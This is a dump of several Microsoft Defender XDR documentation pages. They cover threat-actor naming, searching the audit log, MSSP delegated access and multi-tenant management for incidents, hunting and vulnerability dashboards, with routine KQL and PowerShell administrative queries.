-|Storm-1044||Financially motivated|Danabot|
-|Storm-1084||Iran|DarkBit|
-|Storm-1099||Russia||
-|Storm-1101||Group in development|NakedPages|
-|Storm-1113||Financially motivated||
-|Storm-1133||Palestinian Authority||
-|Storm-1152||Financially motivated||
-|Storm-1167||Indonesia||
-|Storm-1283||Group in development||
-|Storm-1286||Group in development||
-|Storm-1295||Group in development|Greatness|
-|Storm-1364||Iran||
-|Storm-1567||Financially motivated|Akira|
-|Storm-1575||Group in development|Dadsec|
-|Storm-1674||Financially motivated||
-|Strawberry Tempest||Financially motivated|LAPSUS$|
-|Sunglow Blizzard||Russia||
-|Tomato Tempest|SPURR|Financially motivated|Vatet|
-|Vanilla Tempest|DEV-0832|Financially motivated||
-|Velvet Tempest|DEV-0504|Financially motivated||
-|Violet Typhoon|ZIRCONIUM|China|APT31|
-|[Volt Typhoon](https://www.microsoft.com/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques)||China|BRONZE SILHOUETTE, VANGUARD PANDA|
-|Wine Tempest|PARINACOTA|Financially motivated|Wadhrama|
-|Wisteria Tsunami|DEV-0605|Private sector offensive actor|CyberRoot|
-|Zigzag Hail|DUBNIUM|South Korea|Dark Hotel, Tapaoux|
-
-Read our announcement about the new taxonomy for more information: [https://aka.ms/threatactorsblog](https://aka.ms/threatactorsblog)
-
-## Putting intelligence into the hands of security professionals
-
-[Intel profiles in Microsoft Defender Threat Intelligence](../defender/defender-threat-intelligence.md) bring crucial insights about threat actors. These insights enable security teams to get the context they need as they prepare for and respond to threats.
-
-Additionally, the Microsoft Defender Threat Intelligence Intel Profiles API provides the most up-to-date threat actor infrastructure visibility in the industry today. Updated information is crucial in enabling threat intelligence and security operations (SecOps) teams to streamline their advanced threat hunting and analysis workflows. Learn more about this API in the documentation: [Use the threat intelligence APIs in Microsoft Graph (preview)](/graph/api/resources/security-threatintelligence-overview).
-
-## Resources
-
-Use the following query on Microsoft Defender XDR and other Microsoft security products supporting the Kusto query language (KQL) to get information about a threat actor using the old name, new name, or industry name:
-
-```kusto
-let TANames = externaldata(PreviousName: string, NewName: string, Origin: string, OtherNames: dynamic)[@"https://raw.githubusercontent.com/microsoft/mstic/master/PublicFeeds/ThreatActorNaming/MicrosoftMapping.json"] with(format="multijson", ingestionMapping='[{"Column":"PreviousName","Properties":{"Path":"$.Previous name"}},{"Column":"NewName","Properties":{"Path":"$.New name"}},{"Column":"Origin","Properties":{"Path":"$.Origin/Threat"}},{"Column":"OtherNames","Properties":{"Path":"$.Other names"}}]');
-let GetThreatActorAlias = (Name: string) {
-TANames
-| where Name =~ NewName or Name =~ PreviousName or OtherNames has Name
-};
-GetThreatActorAlias("ZINC")
-```
-
-The following files containing the comprehensive mapping of old threat actor names with their new names are also available:
--- [JSON format](https://github.com/microsoft/mstic/blob/master/PublicFeeds/ThreatActorNaming/MicrosoftMapping.json)-- [downloadable Excel](https://download.microsoft.com/download/4/5/2/45208247-c1e9-432d-a9a2-1554d81074d9/microsoft-threat-actor-list.xlsx)
security Microsoft Xdr Auditing https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-xdr-auditing.md
- Title: Search the audit log for events in Microsoft Defender XDR
-description: Learn about the Microsoft Defender XDR activities that are logged in the Microsoft 365 audit log.
------- m365-security-- tier3- Previously updated : 2/21/2024--
-# Search the audit log for events in Microsoft Defender XDR
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-The audit log can help you investigate specific activities across Microsoft 365 services. In the Microsoft Defender XDR portal, Microsoft Defender XDR and Microsoft Defender for Endpoint activities are audited. Some of the activities audited are:
--- Changes to data retention settings-- Changes to advanced features-- Creation of indicators of compromise-- Isolation of devices-- Add\edit\deletion of security roles-- Create\edit custom detection rules-- Assign user to an incidents-
-For a complete list of Microsoft Defender XDR activities that are audited, see [Microsoft Defender XDR activities](#microsoft-defender-xdr-activities) and [Microsoft Defender for Endpoint activities](#microsoft-defender-for-endpoint-activities).
-
-## Requirements
-
-To access the audit log, you need to have the **View-Only Audit Logs** or **Audit Logs** role in Exchange Online. By default, those roles are assigned to the Compliance Management and Organization Management role groups.
-
->[!Note]
-> Global administrators in Office 365 and Microsoft 365 are automatically added as members of the Organization Management role group in Exchange Online.
-
-## Turn on auditing in Microsoft Defender XDR
-
-Microsoft Defender XDR uses the [Microsoft Purview auditing solution](/purview/audit-solutions-overview), before you can look at the audit data in the Microsoft Defender XDR portal:
--- You should confirm that auditing is turned on in the Microsoft Purview compliance portal. For more information, see [Turn auditing on or off](/purview/audit-log-enable-disable).--- Follow the steps below to enable the unified audit log in the Microsoft Defender XDR portal:
- 1. Log in to [Microsoft Defender XDR](https://security.microsoft.com/homepage) using an account with the Security administrator or Global administrator role assigned.
- 2. In the navigation pane, select **Settings** \> **Endpoints** \> **Advanced features**.
- 3. Scroll own to **Unified audit log** and toggle the setting to **On**.
-
- :::image type="content" source="../../media/defender/unified-audit-log.png" alt-text="Screenshot of the unified audit log toggle in Microsoft Defender XDR advanced settings" lightbox="../../media/defender/unified-audit-log.png":::
- 4. Select **Save preferences**.
-
-## Using the audit search in Microsoft Defender XDR
-
-1. To retrieve audit logs for Microsoft Defender XDR activities, navigate to the [Microsoft Defender XDR Audit page](https://security.microsoft.com/auditlogsearch) or go to the [Purview compliance portal](https://compliance.microsoft.com) and select **Audit**.
-
- :::image type="content" source="../../media/defender/unified-audit-log-xdr.png" alt-text="Screenshot of the unified audit log page in Microsoft Defender XDR " lightbox="../../media/defender/unified-audit-log-xdr.png":::
-
-2. On the **New Search** page, filter the activities, dates, and users you want to audit.
-3. Select **Search**
-
- :::image type="content" source="../../media/defender/unified-audit-search.png" alt-text="Screenshot of the unified audit log search options in Microsoft Defender XDR " lightbox="../../media/defender/unified-audit-search.png":::
-
-4. Export your results to Excel for further analysis.
-
-For step-by-step instructions, see [Search the audit log in the compliance portal](/purview/audit-new-search).
-
-Audit log record retention is based on Microsoft Purview retention policies. For more information, see [Manage audit log retention policies](/purview/audit-log-retention-policies).
-
-## Microsoft Defender XDR activities
-
-For a list of all events that are logged for user and admin activities in Microsoft Defender XDR in the Microsoft 365 audit log, see:
--- [Custom detection activities in Microsoft Defender XDR in the audit log](/purview/audit-log-activities#microsoft-defender-xdr-custom-detection-activities)-- [Incident activities in Microsoft Defender XDR in the audit log](/purview/audit-log-activities#microsoft-defender-xdr-custom-detection-activities)-- [Suppression rule activities in Microsoft Defender XDR in the audit log](/purview/audit-log-activities#microsoft-defender-xdr-suppression-rule-activities)-
-## Microsoft Defender for Endpoint activities
-
-For a list of all events that are logged for user and admin activities in Microsoft Defender for Endpoint in the Microsoft 365 audit log, see:
--- [General settings activities in Defender for Endpoint in the audit log](/purview/audit-log-activities#microsoft-defender-for-endpoint-general-settings-activities)-- [Indicator settings activities in Defender for Endpoint in the audit log](/purview/audit-log-activities#microsoft-defender-for-endpoint-indicator-settings-activities)-- [Response action activities in Defender for Endpoint in the audit log](/purview/audit-log-activities#microsoft-defender-for-endpoint-reponse-actions-activities)-- [Roles settings activities in Defender for Endpoint in the audit log](/purview/audit-log-activities#microsoft-defender-for-endpoint-roles-settings-activities)-
-## Using a PowerShell script
-
-You can use the following PowerShell code snippet to query the Office 365 Management API to retrieve information about Microsoft Defender XDR events:
-
-```PowerShell
-$cred = Get-Credential
-$s = New-PSSession -ConfigurationName microsoft.exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $cred -Authentication Basic -AllowRedirection
-Import-PSSession $s
-Search-UnifiedAuditLog -StartDate 2023/03/12 -EndDate 2023/03/20 -RecordType <ID>
-```
-
->[!Note]
-> See the API column in Audit activities included for the record type values.
-
-## Additional resources
--- [Search the audit log in the compliance center](/purview/audit-new-search)-- [Use a PowerShell script to search the audit log](/purview/audit-log-search-script)-- [Detailed properties in the audit log](/purview/audit-log-detailed-properties)-- [Export, configure, and view audit log records](/purview/audit-log-export-records)-- [Office 365 Management Activity API reference](/office/office-365-management-api/office-365-management-activity-api-reference)
security Mssp Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/mssp-access.md
- Title: Provide managed security service provider (MSSP) access
-description: Learn about changes from the Microsoft Defender Security Center to the Microsoft Defender portal
-keywords: Getting started with the Microsoft Defender portal, Microsoft Defender for Office 365, Microsoft Defender for Endpoint, MDO, MDE, single pane of glass, converged portal, security portal, defender security portal
--- NOCSH------ MOE150-- MET150--- m365-security-- tier2 Previously updated : 02/16/2021--
-# Provide managed security service provider (MSSP) access
---
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-To implement a multi-tenant delegated access solution, take the following steps:
-
-1. Enable [role-based access control](/microsoft-365/security/defender-endpoint/rbac) for Defender for Endpoint via the Microsoft Defender portal and connect with Microsoft Entra groups.
-
-2. Configure [entitlement management for external users](/azure/active-directory/governance/entitlement-management-external-users) within Microsoft Entra ID Governance to enable access requests and provisioning.
-
-3. Manage access requests and audits in [Microsoft Myaccess](/azure/active-directory/governance/entitlement-management-request-approve).
-
-<a name='enable-role-based-access-controls-in-microsoft-defender-for-endpoint-in-microsoft-365-defender-portal'></a>
-
-## Enable role-based access controls in Microsoft Defender for Endpoint in Microsoft Defender portal
-
-1. **Create access groups for MSSP resources in Customer Microsoft Entra ID: Groups**
-
- These groups will be linked to the Roles you create in Defender for Endpoint in Microsoft Defender portal. To do so, in the customer AD tenant, create three groups. In our example approach, we create the following groups:
-
- - Tier 1 Analyst
- - Tier 2 Analyst
- - MSSP Analyst Approvers
-
-2. Create Defender for Endpoint roles for appropriate access levels in Customer Defender for Endpoint in Microsoft Defender portal roles and groups.
-
- To enable RBAC in the customer Microsoft Defender portal, access **Permissions > Endpoints roles & groups > Roles** with a user account with Global Administrator or Security Administrator rights.
-
- :::image type="content" source="../../media/mssp-access.png" alt-text="The details of the MSSP access in the Microsoft Defender portal" lightbox="../../media/mssp-access.png":::
-
- Then, create RBAC roles to meet MSSP SOC Tier needs. Link these roles to the created user groups via "Assigned user groups".
-
- Two possible roles:
-
- - **Tier 1 Analysts** <br>
- Perform all actions except for live response and manage security settings.
-
- - **Tier 2 Analysts** <br>
- Tier 1 capabilities with the addition to [live response](/microsoft-365/security/defender-endpoint/live-response).
-
- For more information, see [Manage portal access using role-based access control](/microsoft-365/security/defender-endpoint/rbac).
-
-## Configure Governance Access Packages
-
-1. **Add MSSP as Connected Organization in Customer Microsoft Entra ID: Identity Governance**
-
- Adding the MSSP as a connected organization will allow the MSSP to request and have accesses provisioned.
-
- To do so, in the customer AD tenant, access Identity Governance: Connected organization. Add a new organization and search for your MSSP Analyst tenant via Tenant ID or Domain. We suggest creating a separate AD tenant for your MSSP Analysts.
-
-2. **Create a resource catalog in Customer Microsoft Entra ID: Identity Governance**
-
- Resource catalogs are a logical collection of access packages, created in the customer AD tenant.
-
- To do so, in the customer AD tenant, access Identity Governance: Catalogs, and add **New Catalog**. In our example, we will call it **MSSP Accesses**.
-
- :::image type="content" source="../../media/goverance-catalog.png" alt-text="A new catalog in the Microsoft Defender portal" lightbox="../../media/goverance-catalog.png":::
--
- Further more information, see [Create a catalog of resources](/azure/active-directory/governance/entitlement-management-catalog-create).
-
-3. **Create access packages for MSSP resources Customer Microsoft Entra ID: Identity Governance**
-
- Access packages are the collection of rights and accesses that a requestor will be granted upon approval.
-
- To do so, in the customer AD tenant, access Identity Governance: Access Packages, and add **New Access Package**. Create an access package for the MSSP approvers and each analyst tier. For example, the following Tier 1 Analyst configuration creates an access package that:
-
- - Requires a member of the AD group **MSSP Analyst Approvers** to authorize new requests
- - Has annual access reviews, where the SOC analysts can request an access extension
- - Can only be requested by users in the MSSP SOC Tenant
- - Access auto expires after 365 days
-
- :::image type="content" source="../../media/new-access-package.png" alt-text="The details of a new access package in the Microsoft Defender portal" lightbox="../../media/new-access-package.png":::
-
- For more information, see [Create a new access package](/azure/active-directory/governance/entitlement-management-access-package-create).
-
-4. **Provide access request link to MSSP resources from Customer Microsoft Entra ID: Identity Governance**
-
- The My Access portal link is used by MSSP SOC analysts to request access via the access packages created. The link is durable, meaning the same link may be used over time for new analysts. The analyst request goes into a queue for approval by the **MSSP Analyst Approvers**.
-
- :::image type="content" source="../../media/access-properties.png" alt-text="The access properties in the Microsoft Defender portal" lightbox="../../media/access-properties.png":::
-
- The link is located on the overview page of each access package.
-
-## Manage access
-
-1. Review and authorize access requests in Customer and/or MSSP myaccess.
-
- Access requests are managed in the customer My Access, by members of the MSSP Analyst Approvers group.
-
- To do so, access the customer's myaccess using: `https://myaccess.microsoft.com/@<Customer Domain>`.
-
- Example: `https://myaccess.microsoft.com/@M365x440XXX.onmicrosoft.com#/`
-
-2. Approve or deny requests in the **Approvals** section of the UI.
-
- At this point, analyst access has been provisioned, and each analyst should be able to access the customer's Microsoft Defender portal:
-
- `https://security.microsoft.com/?tid=<CustomerTenantId>` with the permissions and roles they were assigned.
security Mto Advanced Hunting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/mto-advanced-hunting.md
- Title: Advanced hunting in multi-tenant management in Microsoft Defender XDR
-description: Learn about advanced hunting in multi-tenant management in Microsoft Defender XDR
-----
- - m365-security
- - highpri
- - tier1
- Previously updated : 1/5/2024--
-# Advanced hunting in multi-tenant management in Microsoft Defender XDR
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Advanced hunting in multi-tenant management in Microsoft Defender XDR allows you to proactively hunt for intrusion attempts and breach activity in email, data, devices, and accounts across multiple tenants at the same time.
-
-## Run cross-tenant queries
-
-In multi-tenant management, you can use any of the queries you currently have access to. They're filtered by tenant in the **Queries** tab. Select a tenant to view the queries available under each one.
-
-Once you load the query in the query editor, you can then specify the scope of the query by tenant by selecting **Tenant scope**:
-
- :::image type="content" source="../../media/defender/mto-cross-tenants-query.png" alt-text="Screenshot of the Microsoft Defender XDR cross tenants advanced hunting query page" lightbox="../../media/defender/mto-cross-tenants-query.png":::
-
-This action opens a side pane from which you can specify the tenants to include in the query:
-
- :::image type="content" source="../../media/defender/mto-cross-tenants-sidepane.png" alt-text="Screenshot of the Microsoft Defender XDR cross tenants advanced hunting query side pane scope" lightbox="../../media/defender/mto-cross-tenants-sidepane.png":::
-
-Select the tenants you want to include in your query. Select **Apply**, then **Run query**.
-
-> [!NOTE]
-> Queries that use the `join` operator are currently not supported in multi-tenant management advanced hunting.
-
-The query results contain the tenant ID:
-
- :::image type="content" source="../../media/defender/mto-cross-tenants-query-tenant-id.png" alt-text="Screenshot of the Microsoft Defender XDR ross tenants advanced hunting query scope column" lightbox="../../media/defender/mto-cross-tenants-query-tenant-id.png":::
-
-To learn more about advanced hunting in Microsoft Defender XDR, read [Proactively hunt for threats with advanced hunting in Microsoft Defender XDR](advanced-hunting-overview.md).
-
-## Custom detection rules
-
-Likewise, you can manage custom detection rules from multiple tenants in the custom detection rules page.
-
-### View custom detection rules by tenant
-
-1. To view custom detection rules, go to the [Custom detection rules page](https://mto.security.microsoft.com/v2/custom_detection) in multi-tenant management in Microsoft Defender XDR.
-2. View the **Tenant name** column to see which tenant the detection rule comes from:
-
- :::image type="content" source="../../media/defender/mto-custom-detection-tenant-name.png" alt-text="Screenshot of the Microsoft Defender XDR multi-tenant custom detection page" lightbox="../../media/defender/mto-custom-detection-tenant-name.png":::
-
-To view only a specific tenant's custom detection rules, select **Filter**, choose the tenant or tenants and select **Apply**.
-
-To read more about custom detection rules, read [Custom detections overview](custom-detections-overview.md).
-
-### Manage custom detection rules
-
-You can **Run**, **Turn off**, and **Delete** detection rules from multi-tenant management in Microsoft Defender XDR.
-
-To manage detection rules:
-
-1. Go to the [Custom detection rules page](https://mto.security.microsoft.com/v2/custom_detection) in multi-tenant management in Microsoft Defender XDR
-2. Choose the detection rule you want to manage
-
-When you select a single detection rule, a flyout panel opens with the detection rule details:
-
- :::image type="content" source="../../media/defender/custom-detection-rule-details.png" alt-text="Screenshot of the Microsoft Defender XDR custom detection rule details page" lightbox="../../media/defender/custom-detection-rule-details.png":::
-
-Select **Open detection rules** to view this rule in a new tab for the specific tenant in the [Microsoft Defender portal](https://security.microsoft.com). To learn more, see [Custom detection rules](./custom-detection-rules.md).
security Mto Dashboard https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/mto-dashboard.md
- Title: Vulnerability management in multitenant management
-description: Learn about the capabilities of the vulnerability management dashboard in multitenant management in Microsoft Defender XDR
-----
- - m365-security
- - highpri
- - tier1
- Previously updated : 09/01/2023--
-# Vulnerability management in multi-tenant management
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-## Microsoft Defender Vulnerability Management dashboard
-
-You can use the Defender Vulnerability Management dashboard in multi-tenant management to view aggregated and summarized information across all tenants, such as:
--- Your exposure score and exposure level for devices across all tenants.-- Your most exposed tenants along with details of the number of weaknesses, exposed devices, and available recommendations for each tenant.-
- :::image type="content" source="../../medivm-dashboard.png":::
-
-The Defender Vulnerability Management dashboard in multi-tenant management provides the following information across all the tenants you have access to:
-
-|Area|Description|
-|||
-|**Organization Exposure score**|See the current state of your organization's device exposure to threats and vulnerabilities across all tenants.|
-|**Most exposed tenants**|Real time visibility into the tenants with the highest current exposure level.|
-|**Tenants with the largest increase in exposure**|Identify tenants with the largest increase in exposure over the last 30 days.|
-|**Device exposure distribution**|See how many devices are exposed based on their exposure level, across all tenants. Select a section in the doughnut chart to see the number of exposed devices at each level.|
-|**Tenant exposure distribution**|View a summary of exposed tenants aggregated by exposure level.|
-
-## Tenant vulnerability details
-
-The **Tenants page** under **Vulnerability management** includes vulnerability information for all tenants, and at a tenant-specific level, such as exposed devices, security recommendations, weaknesses, and critical CVEs.
-
- :::image type="content" source="../../media/defender/mto-multi-tenant-view.png" alt-text="Screenshot of multi-tenant vulnerability management in Microsoft Defender XDR" lightbox="../../media/defender/mto-multi-tenant-view.png":::
-
-At the top of the page, you can view the number of tenants and the aggregate number of:
--- Exposed devices-- Critical CVEs-- High severity CVEs-- Security recommendations-
-Select a tenant name to navigate to the Defender Vulnerability Management dashboard for that tenant in the [Microsoft Defender XDR](https://security.microsoft.com/machines) portal.
-
-For more information, see [Microsoft Defender Vulnerability Management dashboard](../defender-vulnerability-management/tvm-dashboard-insights.md).
-
-## Related articles
--- [Exposure score](../defender-vulnerability-management/tvm-exposure-score.md)-- [Security recommendations](../defender-vulnerability-management/tvm-security-recommendation.md)
security Mto Incidents Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/mto-incidents-alerts.md
- Title: View and manage incidents and alerts in multi-tenant management in Microsoft Defender XDR
-description: Learn about incidents and alerts in multi-tenant management in Microsoft Defender XDR
-----
- - m365-security
- - highpri
- - tier1
- Previously updated : 09/01/2023--
-# View and manage incidents and alerts
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Multi-tenant management in Microsoft Defender XDR enables security operation center (SOC) analysts to access and analyze data from multiple tenants in one place, allowing them to quickly identify and respond to threats.
-
-You can manage incidents & alerts originating from multiple tenants under **Incidents & alerts**.
-
-## View and investigate incidents
-
-1. To View or investigate an incident, go to the [Incidents page](https://mto.security.microsoft.com/incidents) in multi-tenant management in Microsoft Defender XDR. The **Tenant name** column shows which tenant the incident originates from:
-
- :::image type="content" source="../../media/defender/mto-incidents.png" alt-text="Screenshot of the Microsoft Defender XDR multi-tenant incidents page" lightbox="../../media/defender/mto-incidents.png":::
-
-2. Select the incident you want to view. A flyout panel opens with the incident details page:
-
- :::image type="content" source="../../media/defender/mto-incident-details.png" alt-text="Screenshot of the Microsoft Defender XDR incidents details page" lightbox="../../media/defender/mto-incident-details.png":::
-
-3. From the incident details page you can:
--- Select **Open incident page** to view this incident in a new tab for the specific tenant in the [Microsoft Defender portal](https://security.microsoft.com).-- Select **Manage incident** to assign the incident, set incident tags, set the incident status, and classify the incident.-
-To learn more, see [Investigate incidents](../defender-endpoint/investigate-incidents.md).
-
-## Manage multiple incidents
-
-To manage incidents across multiple tenants:
-
-1. Go to the [Incidents page](https://mto.security.microsoft.com/incidents) in multi-tenant management.
-2. Choose the incidents you want to manage from the incidents list and select **Manage incidents**.
-
- :::image type="content" source="../../media/defender/mto-manage-incidents.png" alt-text="Screenshot of the Microsoft Defender XDR incidents page" lightbox="../../media/defender/mto-manage-incidents.png":::
-
-On the incidents fly-out you can assign incidents, assign incidents tags, set the incident status, and classify multiple incidents for multiple tenants simultaneously.
-
->[!Note]
-> Currently, you can only assign multiple incidents from same tenant.
-
-To learn more about incidents in the Microsoft Defender portal, see [Manage incidents](../defender-endpoint/manage-incidents.md).
-
-## View and investigate alerts
-
-1. To view or investigate an alert, go to the [Alerts page](https://mto.security.microsoft.com/alerts) in multi-tenant management and select the alert you want to view. A flyout panel opens with the alert details page:
-
- :::image type="content" source="../../media/defender/mto-alerts-details.png" alt-text="Screenshot of the Microsoft Defender XDR alert details page" lightbox="../../media/defender/mto-alerts-details.png":::
-
-2. From the alert details page you can:
--- Select actions such as **Open alerts page**, **See in timeline**, and **Tune alert** to view this alert in a new tab for the specific tenant in the [Microsoft Defender portal](https://security.microsoft.com).-- Select **Manage alert** to assign the alert, set the alert status, and classify the alert.-
-To learn more, see [Investigate alerts](../defender-endpoint/investigate-alerts.md).
-
-## Manage multiple alerts
-
-To manage alerts across multiple tenants:
-
-1. Go to the [Alerts page](https://mto.security.microsoft.com/alerts) in multi-tenant management.
-2. Choose the alerts you want to manage from the alerts list and select **Manage alerts**.
-
- :::image type="content" source="../../media/defender/mto-manage-alerts.png" alt-text="Screenshot of the Microsoft Defender XDR alerts page" lightbox="../../media/defender/mto-manage-alerts.png":::
-
-On the alert fly-out you can assign alerts, set the alert status, and classify the alerts for multiple tenants simultaneously.
-
-> [!Note]
-> Currently, you can only assign multiple alerts from same tenant.
-To learn more about alerts in the Microsoft Defender portal, see [Manage alerts](../defender-endpoint/manage-alerts.md).
security Mto Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/mto-overview.md
- Title: Multi-tenant management in Microsoft Defender XDR
-description: Overview of multi-tenant management in Microsoft Defender XDR.
-----
- - m365-security
- - highpri
- - tier1
- Previously updated : 09/01/2023--
-# Overview of multi-tenant management in Microsoft Defender XDR
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
->[!Tip]
->To learn how to turn on preview features, see [Microsoft Defender XDR preview features](preview.md).
-
-Managing multi-tenant environments can add an additional layer of complexity when it comes to keeping up with the ever-evolving security threats facing your enterprise. Navigating across multiple tenants can be time consuming and reduce the overall efficiency of security operation center (SOC) teams.
-
-Multi-tenant management in Microsoft Defender XDR was designed to provide security operation teams with a single, unified view of all the tenants they manage. This view enables teams to quickly investigate incidents and perform advanced hunting across data from multiple tenants, improving their security operations.
-
->[!Tip]
->To learn more about multi-tenant organizations, see [Multi-tenant organizations documentation](/azure/active-directory/multi-tenant-organizations/).
-
-Some of the key benefits you get with multi-tenant management in Microsoft Defender XDR include:
--- **A centralized place to manage incidents across tenants**: A unified view provides SOC analysts with all the information they need for incident investigation across multiple tenants, eliminating the need to sign in and out of each one.--- **Streamlined threat hunting**: Multi-tenancy support enables SOC teams use Microsoft Defender XDR advanced hunting capabilities to create KQL queries that will proactively hunt for threats across multiple tenants.--- **Multi-customer management for partners**: Managed Security Service Provider (MSSP) partners can now gain visibility into security incidents, alerts, and threat hunting across multiple customers through a single pane of glass.-
-<a name='whats-included-in-multi-tenant-management-in-microsoft-365-defender'></a>
-
-## What's included in multi-tenant management in Microsoft Defender XDR
-
-The following key capabilities are available for each tenant you have access to in multi-tenant management in Microsoft Defender XDR:
-
-| Capability | Description |
-| | |
-|**Incidents & alerts** > **Incidents** | Manage incidents originating from multiple tenants.|
-|**Incidents & alerts** > **Alerts** | Manage alerts originating from multiple tenants. |
-|**Hunting** > **Advanced hunting**| Proactively hunt for intrusion attempts and breach activity across multiple tenants at the same time.|
-|**Hunting** > **Custom detection rules**|View and manage custom detection rules across multiple tenants.|
-|**Assets** > **Devices** > **Tenants**| For all tenants and at a tenant-specific level, explore the device counts across different values such as device type, device value, onboarding status, and risk status.|
-|**Endpoints** >**Vulnerability Management** > **Dashboard** |The Microsoft Defender Vulnerability Management dashboard provides both security administrators and security operations teams with aggregated vulnerability management information across multiple tenants. |
-|**Endpoints** > **Vulnerability management** > **Tenants** |For all tenants and at a tenant-specific level, explore vulnerability management information across different values such as exposed devices, security recommendations, weaknesses, and critical CVEs. |
-|**Configuration** > **Settings**|Lists the tenants you have access to. Use this page to view and manage your tenants.|
-
-## Next steps
--- [Set up multi-tenant management in Microsoft Defender XDR](mto-requirements.md)
security Mto Requirements https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/mto-requirements.md
- Title: Set up multitenant management in Microsoft Defender XDR
-description: Learn what steps you need to take to get started with multitenant management in Microsoft Defender XDR.
-----
- - m365-security
- - highpri
- - tier1
- Previously updated : 09/01/2023--
-# Set up multi-tenant management in Microsoft Defender XDR
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-This article describes the steps you need to take to start using multi-tenant management in Microsoft Defender XDR.
-
->[!Note]
->In multi-tenant management, interactions between the multi-tenant user and the managed tenants could involve accessing data and managing configurations. The ability to undertake these actions is determined by the permissions a managed tenant has granted the multi-tenant user.
-
-1. [Review the requirements](#review-the-requirements)
-2. [Verify your tenant access](#verify-your-tenant-access)
-3. [Set up multi-tenant management in Microsoft Defender XDR](#set-up-multi-tenant-management)
-
->[!Note]
-> [Data privacy](data-privacy.md), [role-based access control (RBAC)](m365d-permissions.md) and [Licensing](prerequisites.md#licensing-requirements) are respected by multi-tenant management in Microsoft Defender XDR.
-
-## Review the requirements
-
-The following table lists the basic requirements you need to use multi-tenant management in Microsoft Defender XDR.
-
-| Requirement | Description |
-|:|:|
-| Microsoft Defender XDR prerequisites | Verify you meet the [Microsoft Defender XDR prerequisites](prerequisites.md)|
-| Multi-tenant access | To view and manage the data you have access to in multi-tenant management, you need to ensure you have the necessary access. For each tenant you want to view and manage, you need to have either: <br/> <br/> - [Granular delegated admin privileges (GDAP)](/partner-center/gdap-introduction) <br/> - [Microsoft Entra B2B authentication](/azure/active-directory/external-identities/what-is-b2b) <br/> <br/> To learn more about how to synchronize multiple B2B users across tenants, see [Configure cross-tenant synchronization](/azure/active-directory/multi-tenant-organizations/cross-tenant-synchronization-configure).|
-| Permissions | Users must be assigned the correct roles and permissions at the individual tenant level, in order to view and manage the associated data in multi-tenant management. To learn more, see: <br/><br/> - [Manage access to Microsoft Defender XDR with Microsoft Entra global roles](./m365d-permissions.md) <br/> - [Custom roles in role-based access control for Microsoft Defender XDR](./custom-roles.md)<br/><br/> To learn how to grant permissions for multiple users at scale, see [What is entitlement management](/azure/active-directory/governance/entitlement-management-overview).|
-
->[!Note]
-> Setting up [multi-factor authentication trust](/azure/active-directory/external-identities/authentication-conditional-access) is highly recommended for each tenant to avoid missing data in multi-tenant management Microsoft Defender XDR.
-
-## Verify your tenant access
-
-In order to view and manage the data you have access to in multi-tenant management, you need to ensure you have the necessary permissions. For each tenant you want to view and manage, you need to either:
--- [Verify your tenant access with Microsoft Entra B2B](#verify-your-tenant-access-with-microsoft-entra-b2b)-- [Verify your tenant access with GDAP](#verify-your-tenant-access-with-gdap)-
-### Verify your tenant access with Microsoft Entra B2B
-
-1. Go to [My account](https://myaccount.microsoft.com/organizations).
-2. Under **Organizations > Other organizations you collaborate with** see the list of organizations you have guest access to.
-
- :::image type="content" source="../../media/defender/mto-myaccount.png" alt-text="Screenshot of organizations in the myaccount portal" lightbox="../../media/defender/mto-myaccount.png":::
-
-3. Verify all the tenants you plan to manage appear in the list.
-4. For each tenant, go to the [Microsoft Defender portal](https://security.microsoft.com/?tid=tenant_id) and sign in to validate you can successfully access the tenant.
-
-### Verify your tenant access with GDAP
-
-1. Go to the [Microsoft Partner Center](https://partner.microsoft.com/commerce/granularadminaccess/list).
-2. Under **Customers** you can find the list of organizations you have guest access to.
-3. Verify all the tenants you plan to manage appear in the list.
-4. For each tenant, go to the [Microsoft Defender portal](https://security.microsoft.com/?tid=tenant_id) and sign in to validate you can successfully access the tenant.
-
-## Set up multi-tenant management
-
-The first time you use multi-tenant management in Microsoft Defender XDR, you need setup the tenants you want to view and manage. To get started:
-
-1. Sign in to [Multi-tenant management in Microsoft Defender XDR](https://mto.security.microsoft.com/)
-2. Select **Add tenants**.
-
- :::image type="content" source="../../media/defender/mto-add-tenants.png" alt-text="Screenshot of the Microsoft Defender XDR multi-tenant portal setup screen" lightbox="../../media/defender/mto-add-tenants.png":::
-
-3. Choose the tenants you want to manage and select **Add**
-
->[!Note]
-> The multi-tenant view in Microsoft Defender XDR currently has a limit of 50 target tenants.
-
-The features available in multi-tenant management now appear on the navigation bar and you're ready to view and manage security data across all your tenants.
-
- :::image type="content" source="../../media/defender/mto-tenant-selection.png" alt-text="Screenshot of multi-tenant management in Microsoft Defender XDR" lightbox="../../media/defender/mto-tenant-selection.png":::
-
-## Next step
-
-Use these articles to get started with multi-tenant management in Microsoft Defender XDR:
